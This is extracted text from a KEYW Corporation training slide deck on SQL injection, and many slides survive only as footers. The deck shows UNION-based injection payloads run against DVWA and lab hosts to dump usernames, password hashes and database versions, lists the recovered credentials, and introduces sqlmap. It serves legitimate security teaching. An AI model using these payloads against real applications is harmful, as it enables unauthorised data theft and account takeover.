Академический Документы
Профессиональный Документы
Культура Документы
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
Web Application
Inject Commands
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
SQL DATABASE
Users Table
id password username
Blog Entries
id blog_post
Products Table
id name description
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
SQL Basics
SELECT Extracts data from a table
SELECT username, phone_number FROM users WHERE username=Bob;
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
#,-- , /*comment*/
Comment syntax is used to close/balance SQL queries, also used to assist in malicious SQL statements
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
password
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
10
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
11
2. Select low
3. Click Submit
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
12
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
13
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
14
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
15
16
Note, this is a MySQL specific command, if it were another database such as mssql, it would have failed SQL differs between database type and version Full statement: SELECT first_name, last_name FROM users WHERE user_id = '' UNION SELECT 1, @@version #' "
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
17
SQL DATABASE
users Table
id password username
VIEWS Table
id usr
columns_priv Table
id db host
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
18
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
19
user_id
password
avatar
first_name
last_name
user
table_name = 'users'
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
20
id
1 2 3
user
admin gordonb 1337
avatar
http://192.168... http://192.168... http://192.168...
password
...
...
...
...
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
21
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
22
I can now log into dvwa, with the username gordonb and the password of abc123 !
KEYW Corporation 7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076 T: 443.733.1600 cybertraining@keywcorp.com training.keywcorp.com
23
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
24
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
25
http://172.16.35.12/announcement.php?a_id=' or 1='1
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
26
http://172.16.35.12/announcement.php?a_id=' UNION SELECT null, username, null, powercontrol FROM users WHERE 1='1
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
27
http://172.16.35.13/announcement.php?a_id=' UNION SELECT null, username, null, passwordhash FROM users WHERE 1='1
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
28
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
29
Username: Password:
jlilley jellybean
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
30
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
31
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
32
sqlmap
Python script to perform automated SQL injections and extract data Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems. Full support for six SQL injection techniques: boolean-based blind, timebased blind, error-based, UNION query, stacked queries and out-ofband. Support to enumerate users, password hashes, privileges, roles, databases, tables and columns. Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
33
sqlmap
Developers
Bernardo Damele A. G. (@inquisb) Miroslav Stampar (@stamparm)
Website: sqlmap.org
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
34
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
35
Sqlmap wizard
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
36
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
37
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
38
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
39
Questions?
KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
40
www.keywcorp.com/cybersessions
October Events:
Recovering Deleted USB files 10 October 2013, (Thursday) Web Application Attacks 15 October 2013, (Tuesday) Wi-Fi Hacking and Honeypots 17 October 2013, (Thursday)
KEYW Corporation 7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076
Recovering Deleted USB files 22 October 2013, (Tuesday) Metasploit Crash Course 24 October 2013, (Thursday) Mobile Phone Security 29 October 2013, (Tuesday)
T: 443.733.1600 cybertraining@keywcorp.com training.keywcorp.com
41